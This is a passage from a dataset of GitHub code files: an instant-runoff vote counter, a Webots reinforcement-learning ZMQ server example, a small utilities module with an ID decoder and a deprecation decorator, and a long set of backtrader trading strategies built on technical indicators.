'LIBERAL']]))\n {'BLOC': 0, 'CPC': 0, 'GREEN': 2, 'LIBERAL': 3}\n >>> pr_dict(count_irv([['GREEN'], ['LIBERAL', 'GREEN'], \\\n ['GREEN', 'LIBERAL'], ['GREEN'], ['GREEN', 'LIBERAL']]))\n {'GREEN': 4, 'LIBERAL': 1}\n >>> pr_dict(count_irv([['NDP'], ['NDP'],\\\n ['LIBERAL', 'NDP'], ['LIBERAL'], ['NDP'],\\\n ['NDP'], ['LIBERAL'], ['NDP']]))\n {'LIBERAL': 3, 'NDP': 5}\n '''\n \n eliminate_list = []\n #loop until one candidate is the majority\n while (not has_votes_needed(count_first_choices(ballots),\\\n votes_needed_to_win\\\n (ballots, 1))):\n first_element_dict = count_first_choices(ballots)\n #get the last place candidate\n last_place_variable = [last_place(first_element_dict, seed=None)]\n #eliminate the last place candidate\n ballots = eliminate_candidate(ballots, last_place_variable)\n eliminate_list = eliminate_list + last_place_variable\n #get the updated first choice dictionary\n first_element_new = count_first_choices(ballots)\n \n be_eliminated = count_approval(eliminate_list)\n #add candidates that are eliminated to the dictionary\n for element in be_eliminated:\n be_eliminated[element] = 0\n\n result = add_dicts(be_eliminated, first_element_new)\n return result\n \n \n\n\n################################################################################\n\nif __name__ == '__main__':\n doctest.testmod()\n","repo_name":"YimeiYang/ProjectsClass","sub_path":"COMP 202/Assignment 3/instant_run_off.py","file_name":"instant_run_off.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38656282424","text":"#\n# Synchronized action\n#\nimport zmq\nimport numpy as np\nimport pickle\n\nimport sys\nimport os\nsys.path.append(os.path.abspath(\"/home/efx/Development/PHD/RL/deep-rl-biorob/webots_communication_toolbox/tools\"))\n\ntry:\n from simplerpc import WebotsCommunicatorService\nexcept ImportError as e:\n raise error.DependencyNotInstalled(\"{}. 
(HINT: you need to install Webots_py, and also perform the setup instructions here: https://gitlab.com/srill-fb99/deep-rl-biorob.)\".format(e))\n\n\n\ndef main():\n server = WebotsCommunicatorService(7,np.array([\n [ 0, 1],\n [ 0, 1]\n ]))\n\n # Now broadcast exactly 1M updates followed by END\n reset_model = False\n for i in range(10000):\n if ( i==1000 ):\n reset_model = True\n\n act = np.asarray(np.random.randn(8,1))\n server.step(act)\n\n if(reset_model == True):\n reset_model = False\n #print \"rec:obs {}:{}\".format(i,obs[2][0])\n\n server.syncservice.send(b'END')\n\nif __name__ == '__main__':\n main()\n","repo_name":"NikosKokkinis/deep-rl-webots","sub_path":"biorob-rl-communication-lib/examples/simpleRpc/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30723547813","text":"import base64\nimport functools\nimport inspect\nimport json\nimport warnings\nfrom collections import namedtuple\nfrom itertools import cycle\n\nContainerId = namedtuple(\"ContainerId\", \"inf_id, chat_id, msg_id\")\n\n\ndef xor_key_decrypt(data, key):\n data = base64.b64decode(data).decode(\"utf-8\")\n xored = ''.join(chr(ord(x) ^ ord(y)) for x, y in zip(data, cycle(key)))\n xored = base64.b64decode(xored.encode(\"utf-8\")).decode(\"utf-8\")\n return xored\n\n\ndef decrypt_id(data):\n MSG_SECRET = \"UNhdE39gf0VXG/r6fc8LWpqY\"\n res = xor_key_decrypt(data, MSG_SECRET)\n res = json.loads(res)\n return ContainerId(inf_id=res[\"i\"], chat_id=res[\"c\"], msg_id=res[\"m\"])\n\n\ndef deprecated(reason):\n \"\"\"\n This is a decorator which can be used to mark functions\n as deprecated. It will result in a warning being emitted\n when the function is used.\n \"\"\"\n\n if isinstance(reason, str):\n\n # The @deprecated is used with a 'reason'.\n #\n # .. code-block:: python\n #\n # @deprecated(\"please, use another function\")\n # def old_function(x, y):\n # pass\n\n def decorator(func1):\n\n if inspect.isclass(func1):\n fmt1 = \"Call to deprecated class {name} ({reason}).\"\n else:\n fmt1 = \"Call to deprecated function {name} ({reason}).\"\n\n @functools.wraps(func1)\n def new_func1(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(\n fmt1.format(name=func1.__name__, reason=reason),\n category=DeprecationWarning,\n stacklevel=2\n )\n warnings.simplefilter('default', DeprecationWarning)\n return func1(*args, **kwargs)\n\n return new_func1\n\n return decorator\n\n elif inspect.isclass(reason) or inspect.isfunction(reason):\n\n # The @deprecated is used without any 'reason'.\n #\n # .. 
code-block:: python\n #\n # @deprecated\n # def old_function(x, y):\n # pass\n\n func2 = reason\n\n if inspect.isclass(func2):\n fmt2 = \"Call to deprecated class {name}.\"\n else:\n fmt2 = \"Call to deprecated function {name}.\"\n\n @functools.wraps(func2)\n def new_func2(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(\n fmt2.format(name=func2.__name__),\n category=DeprecationWarning,\n stacklevel=2\n )\n warnings.simplefilter('default', DeprecationWarning)\n return func2(*args, **kwargs)\n\n return new_func2\n\n else:\n raise TypeError(repr(type(reason)))\n","repo_name":"sovaai/sova-ide-processor","sub_path":"nlab/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32716014761","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\nimport backtrader as bt\nfrom BacktraderAPI import BTIndicator\nfrom .BTStrategyExit import *\nfrom .BTStrategyBase import *\nfrom .BTStrategyBuyType import *\nfrom .BTStrategyDebug import *\nfrom .Strategy import *\nimport math\nimport datetime\n\nclass EmptyStrategy(bt.Strategy):\n params = dict(period=2000)\n\n def __init__(self):\n bt.indicators.HurstExponent(period=self.p.period)\n pass\n\nclass KDJStrategy(StopTrailStrategyExit, KDJStrategyBase):\n def next(self):\n super(KDJStrategy, self).next()\n if self.position.size == 0:\n if self.kdj.percJ >= 150:\n self.buy()\n elif self.kdj.percJ <= -50:\n self.sell()\n elif self.position.size > 0:\n if (len(self) - self.holdstart) >= 6:\n if self.kdj.percJ >= 100:\n self.close()\n elif self.position.size < 0:\n if (len(self) - self.holdstart) >= 6:\n if self.kdj.percJ <= -100:\n self.close()\n\n\nclass ModifiedRSIStrategy(StopTrailStrategyExit):\n def __init__(self):\n super(ModifiedRSIStrategy, self).__init__()\n self.rsi = BTIndicator.modifiedRSI()\n self.rsiXUpper = bt.ind.CrossOver(self.rsi.modifiedRSI, 90)\n self.rsiXLower = bt.ind.CrossOver(self.rsi.modifiedRSI, 10)\n self.rsiX30 = bt.ind.CrossOver(self.rsi.modifiedRSI, 30)\n\n def next(self):\n super(ModifiedRSIStrategy, self).next()\n if self.position.size == 0:\n if self.rsiXLower == 1:\n self.buy()\n elif self.rsiXUpper == -1:\n self.sell()\n elif self.position.size > 0:\n if self.rsiXUpper == 1:\n self.close()\n elif self.position.size < 0:\n if self.rsiX30 == -1:\n self.close()\n\nclass AOStrategy(AwesomeOscillatorStrategyBase, StopTrailStrategyExit):\n def next(self):\n super(AOStrategy, self).next()\n if self.position.size == 0:\n if self.aoStreakXZero == 1:\n self.sell()\n elif self.aoStreakXZero == -1:\n self.buy()\n elif self.position.size > 0:\n if self.aoStreak.streak == -2:\n self.close()\n elif self.position.size < 0:\n if self.aoStreak.streak == 2:\n self.close()\n\nclass CzechStrategy(BBandsStrategyBase, VLIStrategyBase, StopTrailStrategyExit):\n def __init__(self):\n super(CzechStrategy, self).__init__()\n self.BBWcondition = bt.ind.SMA(self.bollWidth, period=10) > bt.ind.SMA(self.bollWidth, period=50)\n self.VOLcondition = bt.ind.SMA(self.data.volume, period=10) > bt.ind.SMA(self.data.volume, period=50)\n self.XOverBollTop = bt.ind.CrossOver(self.data, self.boll.top)\n self.XOverBollBot = bt.ind.CrossOver(self.data, self.boll.bot, plot=False)\n self.smaVeryFast = bt.ind.SMA(self.data, period=10)\n self.smaFast = bt.ind.SMA(self.data, period=20)\n self.smaMid = bt.ind.SMA(self.data, period=50)\n self.smaSlow = 
bt.ind.SMA(self.data, period=100)\n self.smaVerySlow = bt.ind.SMA(self.data, period=200)\n self.smaCrossDown = bt.ind.CrossDown(self.smaSlow, self.smaMid)\n self.waitingToShort = False\n\n def next(self):\n if self.position.size == 0:\n\n if self.XOverBollTop == -1 and self.VOLcondition:\n if self.data > self.smaFast:\n if not self.extremeVolatiliy:\n if not self.volatilityLevel:\n if self.smaMid > self.smaVerySlow:\n self.buy()\n elif not self.smaVerySlow > self.smaSlow > self.smaMid:\n self.buy()\n elif self.smaSlow > self.smaVerySlow:\n self.buy()\n #TODO: stop loss at low of last candle\n #TODO: if trade profit > 3%, add stop win at 1%\n elif self.XOverBollBot == 1:\n if self.bollWidth < self.vli.slow:\n self.waitingToShort = True\n\n # if self.waitingToShort:\n # if self.smaCrossDown: # wait for\n # if self.bollWidth < self.vli.top:\n # self.sell()\n # self.waitingToShort = False\n\n elif self.position.size > 0:\n if self.XOverBollBot == -1 and self.VOLcondition:\n self.close()\n elif self.position.size < 0:\n if self.XOverBollTop == 1 and self.VOLcondition:\n self.close()\n\nclass SICrossStrategy(ASIStrategyBase):\n def next(self):\n if self.position.size == 0:\n if self.siXZero == 1:\n self.buy()\n elif self.siXZero == -1:\n self.sell()\n elif self.position.size > 0:\n if self.siXZero == -1:\n self.sell()\n elif self.position.size < 0:\n if self.siXZero == 1:\n self.buy()\n\nclass KAMAXStrategy(KAMAStrategyBase, BBandsKChanSqueezeStrategyBase):\n def next(self):\n if self.position.size == 0:\n if self.squeeze.squeezePerc > self.p.squeezeThreshold:\n if self.kamaXsma == 1:\n self.buy()\n # elif self.siXZero == -1:\n # self.sell()\n elif self.position.size > 0:\n if self.kamaXsma == -1:\n self.sell()\n # elif self.position.size < 0:\n # if self.kamaXsma == 1:\n # self.buy()\n\nclass ClenowTrendFollowingStrategy(bt.Strategy):\n \"\"\"The trend following strategy from the book \"Following the trend\" by Andreas Clenow.\"\"\"\n alias = ('ClenowTrendFollowing',)\n\n params = (\n ('trend_filter_fast_period', 50),\n ('trend_filter_slow_period', 100),\n ('fast_donchian_channel_period', 25),\n ('slow_donchian_channel_period', 50),\n ('trailing_stop_atr_period', 100),\n ('trailing_stop_atr_count', 3),\n ('risk_factor', 0.002)\n )\n\n def __init__(self):\n self.trend_filter_fast = bt.indicators.EMA(period=self.params.trend_filter_fast_period)\n self.trend_filter_slow = bt.indicators.EMA(period=self.params.trend_filter_slow_period)\n self.dc_fast = BTIndicator.DonchianChannels(period=self.params.fast_donchian_channel_period)\n self.dc_slow = BTIndicator.DonchianChannels(period=self.params.slow_donchian_channel_period)\n self.atr = bt.indicators.ATR(period=self.params.trailing_stop_atr_period)\n self.order = None # the pending order\n # For trailing stop loss\n self.sl_order = None # trailing stop order\n self.sl_price = None\n self.max_price = None # track the highest price after opening long positions\n self.min_price = None # track the lowest price after opening short positions\n\n def next(self):\n # self.dc_slow.dcl <= self.dc_fast.dcl <= self.dc_fast.dch <= self.dc_slow.dch\n assert self.dc_slow.dcl <= self.dc_fast.dcl\n assert self.dc_fast.dcl <= self.dc_fast.dch\n assert self.dc_fast.dch <= self.dc_slow.dch\n\n if not self.position: # Entry rules\n assert self.position.size == 0\n\n # Position size rule\n max_loss = self.broker.get_cash() * self.p.risk_factor # cash you afford to loss\n position_size = max_loss / self.atr[0]\n\n if self.data.close > self.dc_slow.dch:\n if 
self.trend_filter_fast > self.trend_filter_slow: # trend filter\n if self.order:\n self.broker.cancel(self.order)\n else:\n # Entry rule 1\n self.order = self.buy(price=self.data.close[0], size=position_size, exectype=bt.Order.Limit)\n self.max_price = self.data.close[0]\n elif self.data.close < self.dc_slow.dcl:\n if self.trend_filter_fast < self.trend_filter_slow: # trend filter\n if self.order:\n self.broker.cancel(self.order)\n else:\n # Entry rule 2\n self.order = self.sell(price=self.data.close[0], size=position_size, exectype=bt.Order.Limit)\n self.min_price = self.data.close[0]\n else:\n assert self.position.size\n # assert self.order is None\n\n # Exit rules\n if self.position.size > 0:\n # Exit rule 1\n if self.data.close < self.dc_fast.dcl:\n self.order = self.order_target_value(target=0.0, exectype=bt.Order.Limit, price=self.data.close[0])\n return\n else:\n # Exit rule 2\n if self.data.close > self.dc_fast.dch:\n self.order = self.order_target_value(target=0.0, exectype=bt.Order.Limit, price=self.data.close[0])\n return\n\n # Trailing stop loss\n trail_amount = self.atr[0] * self.p.trailing_stop_atr_count\n if self.position.size > 0:\n self.max_price = self.data.close[0] if self.max_price is None else max(self.max_price,\n self.data.close[0])\n if self.sl_price is None or self.sl_price < self.max_price - trail_amount:\n self.sl_price = self.max_price - trail_amount # increase trailing price\n if self.sl_order:\n self.broker.cancel(self.sl_order)\n else:\n self.sl_order = self.order_target_value(target=0.0, exectype=bt.Order.Stop, price=self.sl_price)\n elif self.position.size < 0:\n self.min_price = self.data.close[0] if self.min_price is None else min(self.min_price,\n self.data.close[0])\n if self.sl_price is None or self.sl_price > self.min_price + trail_amount:\n self.sl_price = self.min_price + trail_amount # decrease trailing price\n if self.sl_order:\n self.broker.cancel(self.sl_order)\n else:\n self.sl_order = self.order_target_value(target=0.0, exectype=bt.Order.Stop, price=self.sl_price)\n\n\n#Trend Changing, Stochastic Strategy\n\nclass StochasticStrategy(bt.Strategy):\n\n '''\n https://tradingstrategyguides.com/best-stochastic-trading-strategy/\n\n Entry Criteria:\n\n 1. Check the daily chart and make sure the Stochastic indicator < 20 and the %K line crossed above %D line.\n 2. Move Down to the 15-Minute Time Frame and Wait for the Stochastic Indicator to hit the 20 level. %K line crossed above %D line.\n 3. Wait for the Stochastic %K line (blue moving average) to cross above the 20 level\n 4. Wait for a Swing Low Pattern to develop on the 15-Minute Chart\n 5. Entry Long When the Highest Point of the Swing Low Pattern is Broken to the Upside\n 6. Use Protective Stop Loss placed below the most recent 15-minute Swing Low\n 7. 
Take Profit at 2xSL\n\n - Long:\n -\n - Short:\n -\n\n\n Exit Criteria\n - Long/Short: Same as opposite\n '''\n\n params = (\n ('period', 14),\n ('period_dfast', 3),\n ('period_dslow', 3),\n ('upperband', 80.0),\n ('lowerband', 20.0),\n )\n\n def __init__(self):\n self.stochastic = bt.indicators.Stochastic(self.data,\n period=self.p.period,\n period_dfast=self.p.period_dfast,\n period_dslow=self.p.period_dslow,\n safediv=True\n )\n self.kCrosslower = bt.indicators.CrossOver(self.stochastic.l.percK,self.p.lowerband)\n self.kCrossupper = bt.indicators.CrossOver(self.stochastic.l.percK,self.p.upperband)\n self.kCrossD = bt.indicators.CrossOver(self.stochastic.l.percK,self.stochastic.l.percD)\n\n def next(self):\n if self.position.size == 0:\n if self.kCrosslower == 1 and self.kCrossD == 1:\n self.buy(exectype=bt.Order.Stop, price=self.data.close)\n if self.kCrossupper == -1 and self.kCrossD == -1:\n self.sell(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size > 0:\n if self.kCrossupper == -1 and self.kCrossD == -1:\n self.close(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size < 0:\n if self.kCrosslower == 1 and self.kCrossD == 1:\n self.close(exectype=bt.Order.Stop, price=self.data.close)\n\nclass ASOCrossStrategyWithSqueezePercCCI (ASOStrategyBase, BBandsKChanSqueezeStrategyBase, StochasticCCIStrategyBase, SMAStrategyBase):\n def next(self):\n if self.position.size == 0:\n if self.squeeze.squeezePerc > self.p.squeezeThreshold:\n if self.ashXLower == 1 :\n self.buy()\n elif self.ashXUpper == -1 :\n self.sell()\n elif self.position.size > 0:\n if self.ashXUpper == -1 :\n self.sell()\n elif self.position.size < 0 :\n if self.ashXLower == 1 :\n self.buy()\n\nclass CMOCrossStrategyWithSqueezePercCCI (StochasticCCIStrategyBase, BBandsKChanSqueezeStrategyBase):\n def next(self):\n if self.position.size == 0:\n if self.squeeze.squeezePerc > self.p.squeezeThreshold:\n if self.stochcciXUpperband == 1:\n self.buy()\n elif self.stochcciXLowerband == -1:\n self.sell()\n elif self.position.size > 0:\n if self.stochcciXUpperband == -1:\n self.sell()\n elif self.position.size < 0 :\n if self.stochcciXLowerband == 1:\n self.buy()\n\n\n#Channel Strategy\n\nclass KeltnerChannelStrategy(KeltnerChannelStrategyBase):\n def next(self):\n if self.position.size == 0:\n if self.cxKChanTop == 1:\n self.order = self.buy()\n\n elif self.cxKChanBot == -1:\n self.order = self.sell()\n\n\n elif self.position.size > 0:\n if self.cxKChanTop == -1:\n self.sell()\n\n elif self.position.size < 0:\n if self.cxKChanBot == 1:\n self.buy()\n\nclass ChandelierStrategy(bt.Strategy):\n params = dict(period=22, multip=3)\n\n def __init__(self):\n self.dataclose = self.datas[0].close\n\n self.chandelier = BTIndicator.ChandelierExit(period= self.p.period, multip = self.p.multip, subplot=False)\n self.chandelier.csv = True\n\n self.crossUpLong = bt.ind.CrossUp(self.dataclose, self.chandelier.long, subplot=False)\n self.crossUpShort = bt.ind.CrossUp(self.dataclose, self.chandelier.short, subplot=False)\n self.crossDownLong = bt.ind.CrossDown(self.dataclose, self.chandelier.long, subplot=False)\n self.crossDownShort = bt.ind.CrossDown(self.dataclose, self.chandelier.short, subplot=False)\n\n self.longGreaterThanShort = self.chandelier.long > self.chandelier.short\n self.shortGreaterThanLong = self.chandelier.short > self.chandelier.long\n\n self.closeHighest = bt.ind.And(self.dataclose > self.chandelier.long, self.dataclose > self.chandelier.short, subplot=False)\n self.closeLowest = 
bt.ind.And(self.dataclose < self.chandelier.short, self.dataclose < self.chandelier.long, subplot=False)\n # self.closeBetweenLongAndShort = bt.ind.Or(self.longCloseShort, self.shortCloseLong, subplot=False)\n # self.closeBetweenLongAndShort = (self.chandelier.long > self.dataclose and self.dataclose > self.chandelier.short) or (self.chandelier.short > self.dataclose, self.dataclose > self.chandelier.long)\n\n self.crossUp = bt.ind.Or(self.crossUpLong, self.crossUpShort, subplot=False)\n self.crossDown = bt.ind.Or(self.crossDownLong, self.crossDownShort, subplot=False)\n\n\n self.upperBand = bt.ind.Max(self.chandelier.long, self.chandelier.short)\n self.lowerBand = bt.ind.Min(self.chandelier.long, self.chandelier.short)\n self.crossUpperBand = bt.ind.CrossOver(self.dataclose, self.upperBand, subplot=False)\n self.crossLowerBand = bt.ind.CrossOver(self.dataclose, self.lowerBand, subplot=False)\n\n self.cross = bt.ind.CrossOver(self.chandelier.long, self.chandelier.short, subplot=False)\n\n\n def next(self):\n #entry option 1\n # if self.position.size == 0:\n # if self.closeBetweenLongAndShort == 0:\n # if self.crossUp:\n # self.buy()\n # elif self.crossDown:\n # self.sell()\n\n # entry option2\n if self.position.size == 0:\n if self.closeHighest:\n self.buy()\n elif self.closeLowest:\n self.sell()\n\n # entry option3\n # if self.position.size == 0:\n # if self.crossUpperBand == 1:\n # self.buy()\n # elif self.crossLowerBand == -1:\n # self.sell()\n\n #exit option1\n # elif self.position.size > 0:\n # if self.closeBetweenLongAndShort == 1 or self.crossDown == 1:\n # self.sell()\n # elif self.position.size < 0:\n # if self.closeBetweenLongAndShort == 1 or self.crossUp == 1:\n # self.buy()\n\n #exit option2\n # elif self.position.size != 0:\n # if self.closeBetweenLongAndShort == 1:\n # self.close()\n\n # exit option3\n elif self.position.size > 0:\n if self.crossUpperBand == -1:\n self.sell()\n elif self.position.size < 0:\n if self.crossLowerBand == 1:\n self.buy()\n\n # strategy:\n if self.position.size == 0:\n if self.cross == 1:\n self.buy()\n\n elif self.position.size != 0:\n if self.cross == -1:\n self.sell()\n\n\n#Strength of Trend Strategy\n\nclass AroonCrossStrategy(AroonStrategyBase,EMAStrategyBase):\n\n '''\n - Long:\n - close is above 200 EMA\n - Aroon Long touches upper & Short touches lower\n\n - Short:\n - close is below 200 EMA\n - Aroon Short touches upper & Long touches lower\n\n - Exit Criteria:\n - Long: Close Buy when Aroon Long crosses below Aroon Short below 50\n - Short: Close Sell when Aroon Short crosses below Aroon Long below 50\n '''\n\n def next(self):\n orders = self.broker.get_orders_open()\n\n if self.position.size == 0: # not in the market\n if self.data.close > self.ema:\n if self.aroonCross == 1 and self.aroon.aroondown < self.aroonMidBand:\n # if self.aroon.aroonup == self.p.aroonUpBand and self.aroon.aroondown == self.p.aroonLowBand:\n self.buy(exectype=bt.Order.Stop, price=self.data.close)\n if self.data.close < self.ema:\n if self.aroonCross == -1 and self.aroon.aroonup < self.aroonMidBand:\n # if self.aroon.aroondown == self.p.aroonUpBand and self.aroon.aroonup == self.p.aroonLowBand:\n self.sell(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size > 0: # longing in the market\n if self.aroonCross == -1 and self.aroon.aroonup < self.aroonMidBand:\n self.sell(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size < 0: # shorting in the market\n if self.aroonCross == 1 and self.aroon.aroondown < 
self.aroonMidBand:\n self.buy(exectype=bt.Order.Stop, price=self.data.close)\n\nclass DMICrossStrategy(DMIStrategyBase):\n\n '''\n Entry Critria:\n - Long:\n - +DI > -DI\n - ADX > Benchmark\n - Short:\n - +DI < -DI\n - ADX > Benchmark\n\n Exit Critria\n - Long/Short: Same as opposite\n '''\n\n def next(self):\n\n orders = self.broker.get_orders_open()\n\n if self.dmi.adx > self.p.adxBenchmark:\n\n if self.position.size == 0: # not in the market\n\n if self.plusDIXminusDI == 1:\n self.buy(exectype=bt.Order.Stop, price=self.data.close)\n if self.plusDIXminusDI == -1:\n self.sell(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size > 0: # longing in the market\n\n if self.plusDIXminusDI == -1:\n self.sell(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size < 0: # shorting in the market\n\n if self.plusDIXminusDI == 1:\n self.buy(exectype=bt.Order.Stop, price=self.data.close)\n\nclass IchimokuStrategy(IchimokuCloudStrategyBase, StopTrailStrategyExit, HoldStrategyExit, AwesomeOscillatorStrategyBase, PSARStrategyBase):\n def next(self):\n cloud = self.ichimoku.senkou_span_a - self.ichimoku.senkou_span_b\n tenkanGreaterKijun = self.ichimoku.tenkan_sen - self.ichimoku.kijun_sen\n if self.position.size == 0: # not in the market\n\n if tenkanGreaterKijun > 0:\n if (cloud > 0 and self.data > self.ichimoku.senkou_span_a) or (cloud < 0 and self.data > self.ichimoku.senkou_span_b):\n if self.tenkanXKijun == 1 or self.XSenkouB == 1:\n self.buy()\n\n elif tenkanGreaterKijun < 0:\n if (cloud > 0 and self.data < self.ichimoku.senkou_span_b) or (cloud < 0 and self.data < self.ichimoku.senkou_span_a):\n if self.tenkanXKijun == -1 or self.XSenkouB == -1:\n self.sell()\n\n elif self.position.size > 0:\n if (len(self) - self.holdstart) >= self.p.hold:\n if self.tenkanXKijun == -1:\n self.close()\n\n elif self.position.size < 0:\n if (len(self) - self.holdstart) >= self.p.hold:\n if self.tenkanXKijun == 1:\n self.close()\n\n super(IchimokuStrategy, self).next()\n\nclass IchimokuBracketStrategy(IchimokuCloudStrategyBase, BracketBuying, HoldStrategyExit, CCIStrategyBase, AwesomeOscillatorStrategyBase):\n def next(self):\n cloud = self.ichimoku.senkou_span_a - self.ichimoku.senkou_span_b\n tenkanGreaterKijun = self.ichimoku.tenkan_sen - self.ichimoku.kijun_sen\n if self.position.size == 0: # not in the market\n\n if tenkanGreaterKijun > 0:\n if (cloud > 0 and self.data > self.ichimoku.senkou_span_a) or (cloud < 0 and self.data > self.ichimoku.senkou_span_b):\n if self.tenkanXKijun == 1 or self.XSenkouB == 1:\n self.buy()\n\n elif tenkanGreaterKijun < 0:\n if (cloud > 0 and self.data < self.ichimoku.senkou_span_b) or (cloud < 0 and self.data < self.ichimoku.senkou_span_a):\n if self.tenkanXKijun == -1 or self.XSenkouB == -1:\n self.sell()\n\n elif self.position.size > 0:\n if (len(self) - self.holdstart) >= self.p.hold:\n if self.tenkanXKijun == -1:\n self.close()\n\n elif self.position.size < 0:\n if (len(self) - self.holdstart) >= self.p.hold:\n if self.tenkanXKijun == 1:\n self.close()\n\n super(IchimokuBracketStrategy, self).next()\n\nclass IchimokuCloudxDMIStrategy(IchimokuCloudStrategyBase, DMIStrategyBase):\n '''\n Kijun Sen (blue line, confirm future trends): standard line/base line, averaging highest high and lowest low for past 26 periods\n Tenkan Sen (red line, confirm trending/ranging): turning line, averaging highest high and lowest low for past 9 periods\n Chikou Span (green line, confirm future trends): lagging line, today’s closing price plotted 26 periods 
behind\n Senkou Span (red/green band, support and resistance levels):\n - first Senkou line (fast): averaging Tenkan Sen and Kijun Sen, plotted 26 periods ahead\n - second Senkou line (slow): averaging highest high and lowest low over past 52 periods, plotted 26 periods ahead\n\n Entry Criteria:\n\n - Long:\n - The price above the green cloud (price > 1st Senkou line > 2nd Senkou line) (Trend)\n - Tenkan Sen crosses above Kijun Sen (momentum)\n - Price crosses above Kijun Sen (momentum)\n optional: Chikou Span crossing above the price\n - Short:\n - The price below the red cloud (price < 1st Senkou line < 2nd Senkou line) (Trend)\n - Tenkan Sen crosses below Kijun Sen (momentum)\n - Price crosses below Kijun Sen (momentum)\n Optional: Chikou Span crossing down the price\n\n\n Exit Criteria\n - Long/Short: Same as opposite\n\n Failed: DMIcx\n\n '''\n\n def next(self):\n if self.position.size == 0: # not in the market\n\n if self.data.close > self.ichimoku.l.senkou_span_a > self.ichimoku.l.senkou_span_b:\n if self.tenkanXKijun == 1 and self.XKijun == 1:\n if self.dmi.adx > self.p.adxBenchmark:\n self.buy(exectype=bt.Order.Stop, price=self.data.close)\n\n if self.data.close < self.ichimoku.l.senkou_span_a < self.ichimoku.l.senkou_span_b:\n if self.tenkanXKijun == -1 and self.XKijun == -1:\n if self.dmi.adx > self.p.adxBenchmark:\n self.sell(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size > 0: # longing in the market\n\n if self.data.close < self.ichimoku.l.senkou_span_a < self.ichimoku.l.senkou_span_b:\n if self.tenkanXKijun == -1 and self.XKijun == -1:\n if self.dmi.adx > self.p.adxBenchmark:\n self.close(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size < 0: # shorting in the market\n\n if self.data.close > self.ichimoku.l.senkou_span_a > self.ichimoku.l.senkou_span_b:\n if self.tenkanXKijun == 1 and self.XKijun == 1:\n if self.dmi.adx > self.p.adxBenchmark:\n self.close(exectype=bt.Order.Stop, price=self.data.close)\n\nclass TTFStrategy(TTFStrategyBase):\n def next(self):\n if self.position.size == 0:\n if self.ttfCxUpper == -1:\n self.sell()\n elif self.ttfCxLower == 1:\n self.buy()\n elif self.position.size > 0:\n if self.ttfCxUpper == 1:\n self.sell()\n elif self.position.size < 0:\n if self.ttfCxLower == -1:\n self.buy()\n\nclass StochasticTTFStrategy(StochasticTTFStrategyBase):\n def next(self):\n if self.position.size == 0:\n if self.kCxd == -1:\n self.buy()\n\n elif self.kCxd == 1:\n self.sell()\n\n elif self.position.size > 0:\n if self.stochTTF.k <= -100:\n self.sell()\n\n elif self.position.size < 0:\n if self.stochTTF.k >= 100:\n self.buy()\n\nclass TTFwithStopTrail2(TTFStrategyBase):\n params = dict(size=0,stoptype=bt.Order.StopTrail, trailamount=0.0,trailpercent=0.0)\n\n def __init__(self):\n super(TTFwithStopTrail2, self).__init__()\n self.order = None\n\n def next(self):\n if self.position.size == 0:\n if self.ttfCxUpper == -1:\n self.sell()\n self.order = None\n elif self.ttfCxLower == 1:\n self.buy()\n self.order = None\n elif self.position.size > 0:\n # assert self.order is None\n if self.ttfCxUpper == 1:\n self.close()\n elif self.position.size < 0:\n # assert self.order is None\n if self.ttfCxLower == -1:\n self.close()\n\n if self.order is None:\n if self.position.size > 0:\n self.order = self.close(size=1, exectype=self.p.stoptype,\n trailamount=self.p.trailamount)\n # trailpercent=self.p.trailpercent)\n if self.position.size < 0:\n self.order = self.buy(size=1, exectype=self.p.stoptype,\n 
trailamount=self.p.trailamount)\n # trailpercent=self.p.trailpercent)\n\n\n if self.p.trailamount != 0:\n tcheck = self.data.close - self.p.trailamount\n else:\n tcheck = self.data.close * (1.0 - self.p.trailpercent)\n # print(','.join(\n # map(str, [self.datetime.date(), self.data.close[0],\n # self.order.created.price, tcheck])\n # )\n # )\n else:\n if self.p.trailamount != 0:\n tcheck = self.data.close - self.p.trailamount\n else:\n tcheck = self.data.close * (1.0 - self.p.trailpercent)\n\nclass TTFwithStopTrail(TTFStrategyBase, StopTrailStrategyExit):\n params = dict()\n\n def next(self):\n super(TTFwithStopTrail, self).next()\n if self.position.size == 0:\n if self.ttfCxUpper == -1:\n self.sell()\n self.order = None\n elif self.ttfCxLower == 1:\n self.buy()\n self.order = None\n\n elif self.position.size > 0:\n if self.ttfCxUpper == 1:\n self.sell()\n\n elif self.position.size < 0:\n if self.ttfCxLower == -1:\n self.buy()\n\n\n # if self.order is None:\n # if self.position.size > 0:\n # self.order = self.sell(exectype=self.p.stoptype,\n # trailamount=self.p.trailamount,\n # trailpercent=self.p.trailpercent)\n # elif self.position.size < 0:\n # self.order = self.buy(exectype=self.p.stoptype,\n # trailamount=self.p.trailamount,\n # trailpercent=self.p.trailpercent)\n #\n #\n # if self.p.trailamount != 0:\n # tcheck = self.data.close - self.p.trailamount\n # else:\n # tcheck = self.data.close * (1.0 - self.p.trailpercent)\n # # print(','.join(\n # # map(str, [self.datetime.date(), self.data.close[0],\n # # self.order.created.price, tcheck])\n # # )\n # # )\n # else:\n # if self.p.trailamount != 0:\n # tcheck = self.data.close - self.p.trailamount\n # else:\n # tcheck = self.data.close * (1.0 - self.p.trailpercent)\n # # print(','.join(\n # # map(str, [self.datetime.date(), self.data.close[0],\n # # self.order.created.price, tcheck])\n # # )\n # # )\n\nclass MyStrategy(TTFStrategyBase):\n\n def __init__(self):\n super(MyStrategy, self).__init__()\n # init stop loss and take profit order variables\n self.sl_order, self.tp_order = None, None\n\n def notify_trade(self, trade):\n 